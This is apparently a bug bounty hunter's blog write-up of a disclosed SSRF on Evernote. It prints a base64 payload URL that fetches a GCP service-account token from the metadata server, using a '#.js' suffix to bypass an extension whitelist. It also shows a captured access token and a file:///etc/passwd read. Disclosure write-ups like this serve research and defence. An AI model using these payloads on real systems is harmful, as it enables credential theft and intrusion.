Blog Neolex

French Bug bounty hunter

< back

Critical SSRF on Evernote

Category : Web Hacking

Time to read: 2 min read

Posted on March 31, 2022, 8:14 a.m.

In this article I will talk about a critical vulnerability on Evernote : it was a SSRF that allowed me to access GCP credentials from fetch GCP metadata  webserver .

The first day hunting on evernote I didn't find anything juicy after 2 hours so I stopped.

The next day as soon as I open Evernote I saw a juicy requests :

If you decode the base64 value in the url : 


L2Y2Y2RkNGJkZmE0YzFiODZmNDQxYzdjMjlmMDcyZTUxMWRkMzQ1MDEuY3Nz

you get :


/f6cdd4bdfa4c1b86f441c7c29f072e511dd34501.css

and the content of f6cdd4bdfa4c1b86f441c7c29f072e511dd34501.css is shown inside the response, so I immediatly thought about SSRF !

I tried the value of http://169.254.169.254 in base64 but it wasn't working, after a little time of trial and errors I understood that there was a whitelist to url/filepath that ends with .css or .js, so I used to following payload url :

https://www.evernote.com/ro/aHR0cDovL21ldGFkYXRhLmdvb2dsZS5pbnRlcm5hbC9jb21wdXRlTWV0YWRhdGEvdjFiZXRhMS9pbnN0YW5jZS9zZXJ2aWNlLWFjY291bnRzL2RlZmF1bHQvdG9rZW4jLmpz/-1430533899.js

which is the base64 for :


http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token#.js

the .js after the # will be send as hash so not interpreted by the server but the extensions is allowed since it ends with .js and I got the access token :


{"access_token":"ya29.c.Ko4B_gd-ROPkMva4XDYr-U2r-G_KMv8hy6ViP1f3kotzmmW9aiK8Zphl0QSOEBgqTSiBYtV-Yuy6-innnpf-0IQEgmBqWU_wT2ZYmGjceeyNB79WxYgDnBrOegozvYYOenisR-xBnkDX_AzAFGsDaToQ87QNHNjpK8CLeoFb3jZkO4D7mn532qv7NYuD9CIH0w","expires_in":2298,"token_type":"Bearer"};

 

I found out then that it was also possible to access local files via the base64 encoded value of


file:///etc/passwd#.js

 

I got a 5 000$ bounty from Evernote which his their critical bounty, here is the hackerone report

It was my first bug bounty write-up I hope it was interesting, I'll try to make more write-ups in the future !

 

 

 

Don't hesitate t o reach me on Twitter !